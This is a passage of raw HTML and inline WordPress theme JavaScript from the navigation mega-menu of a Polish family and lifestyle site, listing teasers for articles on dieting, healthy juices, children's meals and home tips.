class=\"td-post-category\">Odchudzanie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/skuteczne-odchudzanie-podstawa-dobry-plan\/\" rel=\"bookmark\" title=\"Skuteczne odchudzanie? Podstawa to dobry plan!\">Skuteczne odchudzanie? Podstawa to dobry plan!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-09-08T10:42:29+00:00\" >8 wrze\u015bnia 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_41_5c5e20b79a126","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_41_5c5e20b79a126));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 38;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-soki-tloczone-smaczna-alternatywa-dla-slodyczy\/\" rel=\"bookmark\" title=\"Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/zdrowe-odzywianie\/\" class=\"td-post-category\">Zdrowe od\u017cywianie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-soki-tloczone-smaczna-alternatywa-dla-slodyczy\/\" rel=\"bookmark\" title=\"Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy\">Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-03T11:51:14+00:00\" >3 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/prowadzisz-zdrowy-tryb-zycia-znajdz-alternatywe-dla-kranowej-i-sklepowej-wody\/\" rel=\"bookmark\" title=\"Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/zdrowe-odzywianie\/\" class=\"td-post-category\">Zdrowe od\u017cywianie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/prowadzisz-zdrowy-tryb-zycia-znajdz-alternatywe-dla-kranowej-i-sklepowej-wody\/\" rel=\"bookmark\" title=\"Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody\">Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-09T13:31:31+00:00\" >9 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czy-warto-kupowac-butelke-filtrujaca\/\" rel=\"bookmark\" title=\"Czy warto kupowa\u0107 butelk\u0119 filtruj\u0105c\u0105?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/40be5d4eedca114ea91734393663fcf4-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/40be5d4eedca114ea91734393663fcf4-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/40be5d4eedca114ea91734393663fcf4-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/40be5d4eedca114ea91734393663fcf4-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czy warto kupowa\u0107 butelk\u0119 filtruj\u0105c\u0105?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/zdrowe-odzywianie\/\" class=\"td-post-category\">Zdrowe od\u017cywianie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czy-warto-kupowac-butelke-filtrujaca\/\" rel=\"bookmark\" title=\"Czy warto kupowa\u0107 butelk\u0119 filtruj\u0105c\u0105?\">Czy warto kupowa\u0107 butelk\u0119 filtruj\u0105c\u0105?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-08-29T21:34:01+00:00\" >29 sierpnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_41_5c5e20b79a126","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_41_5c5e20b79a126_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_41_5c5e20b79a126"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_41_5c5e20b79a126" id="td_uid_42_5c5e20b79a4ba" data-td_block_id="td_uid_41_5c5e20b79a126" data-td_filter_value="40" href="http://www.erodzina.com/kategoria/diety-i-fitness/diety/">Diety</a><a class="mega-menu-sub-cat-td_uid_41_5c5e20b79a126" id="td_uid_43_5c5e20b79a4eb" data-td_block_id="td_uid_41_5c5e20b79a126" data-td_filter_value="36" href="http://www.erodzina.com/kategoria/diety-i-fitness/kobieta-i-sport/">Kobieta i sport</a><a class="mega-menu-sub-cat-td_uid_41_5c5e20b79a126" id="td_uid_44_5c5e20b79a513" data-td_block_id="td_uid_41_5c5e20b79a126" data-td_filter_value="39" href="http://www.erodzina.com/kategoria/diety-i-fitness/odchudzanie/">Odchudzanie</a><a class="mega-menu-sub-cat-td_uid_41_5c5e20b79a126" id="td_uid_45_5c5e20b79a537" data-td_block_id="td_uid_41_5c5e20b79a126" data-td_filter_value="38" href="http://www.erodzina.com/kategoria/diety-i-fitness/zdrowe-odzywianie/">Zdrowe odżywianie</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_41_5c5e20b79a126 mega-menu-cat-all" id="td_uid_46_5c5e20b79a55b" data-td_block_id="td_uid_41_5c5e20b79a126" data-td_filter_value="" href="http://www.erodzina.com/kategoria/diety-i-fitness/">Wszystko Diety i Fitness</a></div></div><div id="td_uid_41_5c5e20b79a126" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/zdrowe-soki-tloczone-smaczna-alternatywa-dla-slodyczy/" rel="bookmark" title="Zdrowe soki tłoczone – smaczna alternatywa dla słodyczy"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/beverage-882652_1280-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/beverage-882652_1280-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/beverage-882652_1280-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/beverage-882652_1280-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Zdrowe soki tłoczone – smaczna alternatywa dla słodyczy"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/zdrowe-odzywianie/" class="td-post-category">Zdrowe odżywianie</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/zdrowe-soki-tloczone-smaczna-alternatywa-dla-slodyczy/" rel="bookmark" title="Zdrowe soki tłoczone – smaczna alternatywa dla słodyczy">Zdrowe soki tłoczone – smaczna alternatywa dla słodyczy</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-03T11:51:14+00:00">3 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/bo-sport-to-zdrowie/" rel="bookmark" title="Bo sport to zdrowie"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/10/36ff890fac12fd0426d2eb1e6e93c98b-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/10/36ff890fac12fd0426d2eb1e6e93c98b-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/10/36ff890fac12fd0426d2eb1e6e93c98b-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/10/36ff890fac12fd0426d2eb1e6e93c98b-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Bo sport to zdrowie"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/kobieta-i-sport/" class="td-post-category">Kobieta i sport</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/bo-sport-to-zdrowie/" rel="bookmark" title="Bo sport to zdrowie">Bo sport to zdrowie</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-10-11T16:38:53+00:00">11 października 2018</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/prowadzisz-zdrowy-tryb-zycia-znajdz-alternatywe-dla-kranowej-i-sklepowej-wody/" rel="bookmark" title="Prowadzisz zdrowy tryb życia? Znajdź alternatywę dla kranowej i sklepowej wody"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/10/b7ced0428e2b6d9adff8cbca53fbb0d8-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/10/b7ced0428e2b6d9adff8cbca53fbb0d8-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/10/b7ced0428e2b6d9adff8cbca53fbb0d8-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/10/b7ced0428e2b6d9adff8cbca53fbb0d8-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Prowadzisz zdrowy tryb życia? Znajdź alternatywę dla kranowej i sklepowej wody"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/zdrowe-odzywianie/" class="td-post-category">Zdrowe odżywianie</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/prowadzisz-zdrowy-tryb-zycia-znajdz-alternatywe-dla-kranowej-i-sklepowej-wody/" rel="bookmark" title="Prowadzisz zdrowy tryb życia? Znajdź alternatywę dla kranowej i sklepowej wody">Prowadzisz zdrowy tryb życia? Znajdź alternatywę dla kranowej i sklepowej wody</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-10-09T13:31:31+00:00">9 października 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_41_5c5e20b79a126" data-td_block_id="td_uid_41_5c5e20b79a126"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_41_5c5e20b79a126" data-td_block_id="td_uid_41_5c5e20b79a126"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5103"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/" class="sf-with-ul">Porady<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_47_5c5e20b79eb31 = new tdBlock();
block_td_uid_47_5c5e20b79eb31.id = "td_uid_47_5c5e20b79eb31";
block_td_uid_47_5c5e20b79eb31.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"9","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_47_5c5e20b79eb31_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_47_5c5e20b79eb31_rand","tdc_css_class_style":"td_uid_47_5c5e20b79eb31_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_47_5c5e20b79eb31.td_column_number = "3";
block_td_uid_47_5c5e20b79eb31.block_type = "td_block_mega_menu";
block_td_uid_47_5c5e20b79eb31.post_count = "3";
block_td_uid_47_5c5e20b79eb31.found_posts = "295";
block_td_uid_47_5c5e20b79eb31.header_color = "";
block_td_uid_47_5c5e20b79eb31.ajax_pagination_infinite_stop = "";
block_td_uid_47_5c5e20b79eb31.max_num_pages = "99";
tdBlocksArray.push(block_td_uid_47_5c5e20b79eb31);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_47_5c5e20b79eb31));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/szukasz-zdrowego-oleju-poznaj-olejarnie-gaja\/\" rel=\"bookmark\" title=\"Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/przepisy-kulinarne\/\" class=\"td-post-category\">Przepisy kulinarne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/szukasz-zdrowego-oleju-poznaj-olejarnie-gaja\/\" rel=\"bookmark\" title=\"Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja\">Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-05T10:26:51+00:00\" >5 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/urodziny-dziecka-w-restauracji-doskonaly-pomysl\/\" rel=\"bookmark\" title=\"Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-domowe\/\" class=\"td-post-category\">Porady domowe<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/urodziny-dziecka-w-restauracji-doskonaly-pomysl\/\" rel=\"bookmark\" title=\"Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!\">Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-03T11:28:53+00:00\" >3 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/upiekszamy-mieszkanie\/\" rel=\"bookmark\" title=\"Upi\u0119kszamy mieszkanie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Upi\u0119kszamy mieszkanie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/twoj-dom-i-ogrod\/\" class=\"td-post-category\">Tw\u00f3j dom i ogr\u00f3d<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/upiekszamy-mieszkanie\/\" rel=\"bookmark\" title=\"Upi\u0119kszamy mieszkanie\">Upi\u0119kszamy mieszkanie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-11-21T20:40:22+00:00\" >21 listopada 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_47_5c5e20b79eb31","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_47_5c5e20b79eb31));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 45;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/pyszne-platki-corn-flakes-kakao-miod\/\" rel=\"bookmark\" title=\"Pyszne p\u0142atki Corn Flakes Kakao i Mi\u00f3d\"><img width=\"130\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/08\/Placuszki_CF_kakao_i_miod1.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/08\/Placuszki_CF_kakao_i_miod1.jpg 667w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/08\/Placuszki_CF_kakao_i_miod1-200x300.jpg 200w\" sizes=\"(max-width: 130px) 100vw, 130px\" alt=\"\" title=\"Pyszne p\u0142atki Corn Flakes Kakao i Mi\u00f3d\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/kuchnia-malucha\/\" class=\"td-post-category\">Kuchnia malucha<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/pyszne-platki-corn-flakes-kakao-miod\/\" rel=\"bookmark\" title=\"Pyszne p\u0142atki Corn Flakes Kakao i Mi\u00f3d\">Pyszne p\u0142atki Corn Flakes Kakao i Mi\u00f3d<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-08-28T09:35:12+00:00\" >28 sierpnia 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/dieta-dziecka-5\/\" rel=\"bookmark\" title=\"Dieta dziecka na 5+!\"><img width=\"260\" height=\"186\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Fotolia_67441381_S_copyright.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Fotolia_67441381_S_copyright.jpg 848w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Fotolia_67441381_S_copyright-300x214.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Fotolia_67441381_S_copyright-768x549.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Fotolia_67441381_S_copyright-342x246.jpg 342w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Dieta dziecka na 5+!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/kuchnia-malucha\/\" class=\"td-post-category\">Kuchnia malucha<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/dieta-dziecka-5\/\" rel=\"bookmark\" title=\"Dieta dziecka na 5+!\">Dieta dziecka na 5+!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-05-30T20:46:04+00:00\" >30 maja 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/dniu-dziecka-pokazmy-najmlodszym-lezalo-naszej-naturze-bylismy-dziecmi\/\" rel=\"bookmark\" title=\"W Dniu Dziecka poka\u017cmy najm\u0142odszym, co le\u017ca\u0142o w naszej naturze, gdy sami byli\u015bmy dzie\u0107mi\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Lubella_Mlekolaki_shake.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Lubella_Mlekolaki_shake.jpg 800w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Lubella_Mlekolaki_shake-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Lubella_Mlekolaki_shake-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Lubella_Mlekolaki_shake-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/05\/Lubella_Mlekolaki_shake-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"W Dniu Dziecka poka\u017cmy najm\u0142odszym, co le\u017ca\u0142o w naszej naturze, gdy sami byli\u015bmy dzie\u0107mi\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/kuchnia-malucha\/\" class=\"td-post-category\">Kuchnia malucha<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/dniu-dziecka-pokazmy-najmlodszym-lezalo-naszej-naturze-bylismy-dziecmi\/\" rel=\"bookmark\" title=\"W Dniu Dziecka poka\u017cmy najm\u0142odszym, co le\u017ca\u0142o w naszej naturze, gdy sami byli\u015bmy dzie\u0107mi\">W Dniu Dziecka poka\u017cmy najm\u0142odszym, co le\u017ca\u0142o w naszej naturze, gdy...<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-05-30T20:21:26+00:00\" >30 maja 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_47_5c5e20b79eb31","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_47_5c5e20b79eb31));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 42;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/urodziny-dziecka-w-restauracji-doskonaly-pomysl\/\" rel=\"bookmark\" title=\"Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/glowne-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-domowe\/\" class=\"td-post-category\">Porady domowe<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/urodziny-dziecka-w-restauracji-doskonaly-pomysl\/\" rel=\"bookmark\" title=\"Urodziny dziecka w restauracji? Doskona\u0142y pomys\u0142!\">Urodziny dziecka w 